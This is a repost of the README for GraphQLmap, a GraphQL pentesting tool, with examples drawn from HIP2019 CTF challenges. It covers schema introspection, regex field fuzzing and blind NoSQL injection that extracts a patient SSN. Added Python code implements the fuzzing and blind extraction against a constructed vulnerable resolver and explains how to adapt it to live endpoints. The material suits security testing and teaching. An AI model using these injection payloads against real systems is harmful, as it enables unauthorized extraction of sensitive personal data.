GraphQLmap is a [scripting](<https://www.kitploit.com/search/label/Scripting> "scripting" ) engine to interact with a graphql endpoint for [pentesting](<https://www.kitploit.com/search/label/Pentesting> "pentesting" ) purposes.
**Install**

```
$ git clone https://github.com/swisskyrepo/GraphQLmap
$ cd GraphQLmap
$ python3 graphqlmap.py
   _____                 _      ____  _
  / ____|               | |    / __ \| |
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
                  | |                                       | |
                  |_|                                       |_|
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]

optional arguments:
  -h, --help           show this help message and exit
  -u URL               URL to query : example.com/graphql?query={}
  -v [VERBOSITY]       Enable verbosity
  --method [METHOD]    HTTP Method to use interact with /graphql endpoint
  --headers [HEADERS]  HTTP Headers sent to /graphql endpoint
  --json               Send requests using POST and JSON
```
**Features and examples**
Examples are based on several CTF challenges from HIP2019.
**Connect to a graphql endpoint**

```
python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'
```
**Dump a GraphQL schema**

Use `dump_new` to dump the GraphQL schema through introspection. The function automatically populates the prompt's autocomplete with the type, field and argument names it finds. If the target has introspection disabled, the dump comes back empty and you are left with the field fuzzing described further down.

[Live Example](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap schema dump")
```
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
  doctor[]: email (String!),
  doctors[Doctor]:
  patients[Patient]:
  patient[]: id (ID!),
  allrendezvous[Rendezvous]:
  rendezvous[]: id (ID!),
Doctor
  id[ID]:
  firstName[String]:
  lastName[String]:
  specialty[String]:
  patients[None]:
  rendezvous[None]:
  email[String]:
  password[String]:
[...]
```
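The dump above is produced by a standard GraphQL introspection query. The following is an added example, not GraphQLmap's own code: it shows the introspection document a tool like `dump_new` sends, and how the nested `NON_NULL`/`LIST`/`ofType` references in the response are unwrapped into `name[Type]: arg (Type!)` lines and an autocomplete word list. The response it parses is constructed to mirror the HIP2019 schema, not captured from a real endpoint, and the `[Doctor]`/`ID!` rendering is this example's own, slightly more precise than the tool's.

```python
"""Added example: introspection query plus schema rendering (not GraphQLmap's code)."""
import json

# Standard introspection document. A tool POSTs it as {"query": INTROSPECTION_QUERY}
# (GraphQLmap's --json mode) or in the ?query= parameter.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    types {
      kind name
      fields { name args { name type { ...TypeRef } } type { ...TypeRef } }
    }
  }
}
fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }
"""

# Constructed response, modelled on the schema printed above (assumption, not real data).
SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "doctor",
             "args": [{"name": "email", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}],
             "type": {"kind": "OBJECT", "name": "Doctor", "ofType": None}},
            {"name": "doctors", "args": [],
             "type": {"kind": "LIST", "name": None,
                      "ofType": {"kind": "OBJECT", "name": "Doctor", "ofType": None}}},
        ]},
        {"kind": "OBJECT", "name": "Doctor", "fields": [
            {"name": "id", "args": [], "type": {"kind": "NON_NULL", "name": None,
             "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}},
            {"name": "password", "args": [],
             "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        ]},
        {"kind": "SCALAR", "name": "String", "fields": None},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
    ]}}})


def type_name(ref):
    """Unwrap a __Type reference: NON_NULL adds '!', LIST adds brackets, else the name."""
    if ref is None:
        return ""
    if ref["kind"] == "NON_NULL":
        return type_name(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + type_name(ref["ofType"]) + "]"
    return ref["name"] or ""


def dump_schema(body):
    """Render an introspection response as (schema lines, sorted autocomplete words)."""
    schema = json.loads(body)["data"]["__schema"]
    lines, words = [], set()
    for t in schema["types"]:
        # Skip introspection meta-types (__Schema, __Type, ...) and field-less scalars.
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        lines.append(t["name"])
        words.add(t["name"])
        for f in t["fields"]:
            args = ", ".join(f"{a['name']} ({type_name(a['type'])})" for a in f["args"])
            lines.append(f"  {f['name']}[{type_name(f['type'])}]: {args}".rstrip())
            words.add(f["name"])
            words.update(a["name"] for a in f["args"])
    return lines, sorted(words)


if __name__ == "__main__":
    schema_lines, autocomplete = dump_schema(SAMPLE_RESPONSE)
    print("\n".join(schema_lines))
    print("autocomplete:", autocomplete)
```

The sensitive part of the dump is usually what you read off it by eye: a `password[String]` field on an object returned by a public query, as in the output above, is the first thing to ask for once you start writing queries.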
**Interact with a GraphQL endpoint**

Write a GraphQL request at the prompt and execute it. In the HIP2019 target the `search` argument is a raw filter string handed to the database, so a MongoDB `$regex` operator inside it is honoured; that is what the fuzzing and blind extraction below build on.

```
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
  "data": {
    "doctors": [
      {
        "firstName": "Admin",
        "id": "5d089c51dcab2d0032fdd08d",
        "lastName": "Admin"
      }
    ]
  }
}
```
**GraphQL field fuzzing**

Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` as placeholders to fuzz a parameter: `GRAPHQL_CHARSET` is replaced by each character of a charset in turn, `GRAPHQL_INCREMENT` by increasing integers. The number in parentheses on each result line is the response length, which is the signal to read. In the run below only `*`, `.`, `?` and `n` change the length (206 instead of 45), which is exactly the set of characters that make `Admi` match `Admin` as a regular expression, confirming that the value is evaluated as a regex rather than compared literally.

[Live Example](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap field fuzzing")
```
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
```
**NoSQL injection**

Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. The placeholder sits after a `^` anchor in a `$regex` filter; the tool then asks for a `Check` string that only appears in a true response (here the Admin doctor's id) and a `Charset`, and recovers the value one character at a time by keeping each character whose probe still returns the check string. Keep regex metacharacters out of the charset, or escape them, since they would match more than one character.

[Live Example](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap NoSQL injection")
```
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >
```
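The two techniques above, `GRAPHQL_CHARSET` fuzzing and `BLIND_PLACEHOLDER` extraction, share one mechanism: substitute a placeholder, send the query, and compare responses. The following is an added example, not GraphQLmap's own code, that implements both against a constructed stand-in for the injectable resolver (a `find()` that takes the user's `search` string as its filter). The `DOCTORS` data, the `vulnerable_endpoint` function and the template queries are assumptions made for this example; the `send` argument is any callable that takes a query string and returns the response body, so a `requests`-based function pointed at a real `/graphql` would slot in unchanged.

```python
"""Added example: charset fuzzing and blind regex extraction (not GraphQLmap's code)."""
import json
import re
from collections import Counter

GRAPHQL_CHARSET = "GRAPHQL_CHARSET"
BLIND_PLACEHOLDER = "BLIND_PLACEHOLDER"

# Constructed collection standing in for the HIP2019 target; ids and SSNs are made up.
DOCTORS = [
    {"id": "5d089c51dcab2d0032fdd08d", "firstName": "Admin", "lastName": "Admin",
     "patients": [{"ssn": "ab12-cd34"}]},
    {"id": "5d089c51dcab2d0032fdd08e", "firstName": "Alice", "lastName": "Adams",
     "patients": [{"ssn": "ff00-ee11"}]},
]
ADMIN_ID = DOCTORS[0]["id"]


def _values(doc, path):
    """Resolve a dotted key ("patients.ssn") like MongoDB, descending into arrays."""
    vals = [doc]
    for part in path.split("."):
        nxt = []
        for v in vals:
            items = v if isinstance(v, list) else [v]
            nxt.extend(x[part] for x in items if isinstance(x, dict) and part in x)
        vals = nxt
    return vals


def _matches(doc, flt):
    """Tiny subset of a Mongo filter: equality and {"$regex": ...}; raises on a bad pattern."""
    for key, cond in flt.items():
        vals = _values(doc, key)
        if isinstance(cond, dict) and "$regex" in cond:
            if not any(re.search(cond["$regex"], str(v)) for v in vals):
                return False
        elif cond not in vals:
            return False
    return True


def vulnerable_endpoint(query):
    """Stand-in for the injectable resolver: extracts the GraphQL `search` string,
    unescapes it, json-loads it and uses it as the find() filter as-is."""
    m = re.search(r'search:\s*"((?:[^"\\]|\\.)*)"', query)
    if not m:
        return json.dumps({"errors": [{"message": "missing search"}]})
    try:
        flt = json.loads(re.sub(r"\\(.)", r"\1", m.group(1)))
        if not isinstance(flt, dict):
            raise ValueError("filter must be an object")
        hits = [{"firstName": d["firstName"], "lastName": d["lastName"], "id": d["id"]}
                for d in DOCTORS if _matches(d, flt)]
    except (ValueError, TypeError, re.error):
        return json.dumps({"errors": [{"message": "invalid search"}]})
    return json.dumps({"data": {"doctors": hits}})


def _graphql_regex_literal(s):
    """Escape `s` so it matches literally after both the GraphQL string and the JSON
    inside it are unescaped: one regex backslash has to be sent as four."""
    return re.escape(s).replace("\\", "\\\\\\\\")


def charset_fuzz(send, template, charset):
    """GRAPHQL_CHARSET-style fuzzing: send each raw character, record the response length."""
    return {c: len(send(template.replace(GRAPHQL_CHARSET, c))) for c in charset}


def outliers(lengths):
    """Characters whose response length differs from the most common one. An error
    body is an outlier too, so read the body before treating a candidate as a match."""
    common = Counter(lengths.values()).most_common(1)[0][0]
    return {c for c, n in lengths.items() if n != common}


def blind_extract(send, template, check, charset, max_len=64):
    """BLIND_PLACEHOLDER-style extraction: grow the prefix one character at a time,
    keeping a character when the response still contains `check`."""
    found = ""
    for _ in range(max_len):
        for c in charset:
            probe = template.replace(BLIND_PLACEHOLDER, _graphql_regex_literal(found + c))
            if check in send(probe):
                found += c
                break
        else:
            return found  # no character extends the prefix: value is complete
    return found


FUZZ_TEMPLATE = r'{doctors(search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}'
BLIND_TEMPLATE = (r'{doctors(search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"},'
                  r' \"lastName\": \"Admin\" }"){id firstName}}')

if __name__ == "__main__":
    lengths = charset_fuzz(vulnerable_endpoint, FUZZ_TEMPLATE, "!$%()*+,-./01?n")
    for c, n in lengths.items():
        print(f"[+] Query: ({n}) {FUZZ_TEMPLATE.replace(GRAPHQL_CHARSET, c)}")
    print("candidates:", sorted(outliers(lengths)))
    print("[+] Data found:", blind_extract(vulnerable_endpoint, BLIND_TEMPLATE, ADMIN_ID, "0123456789abcdef-"))
```

Two details matter when adapting this to a live target. Length alone does not distinguish a regex match from a backend error: `(` and `)` produce a different length here because the pattern fails to compile, so `outliers` flags them as well and the body has to be read. And the extraction escapes the prefix before sending it, which the tool's transcript above gets away with only because `0123456789abcdef-` contains no metacharacters that matter outside a character class.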
**SQL injection**

```
GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli
```
**TODO**

* Docker with [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) GraphQL
* Unit tests
* Handle Relay-style `edges { node { ... } }` connections:

```graphql
{
  user {
    edges {
      node {
        username
      }
    }
  }
}
```
**[Download GraphQLmap](<https://github.com/swisskyrepo/GraphQLmap> "Download GraphQLmap" )**
Source: KitPloit, published 2021-05-22, http://www.kitploit.com/2021/05/graphqlmap-scripting-engine-to-interact.html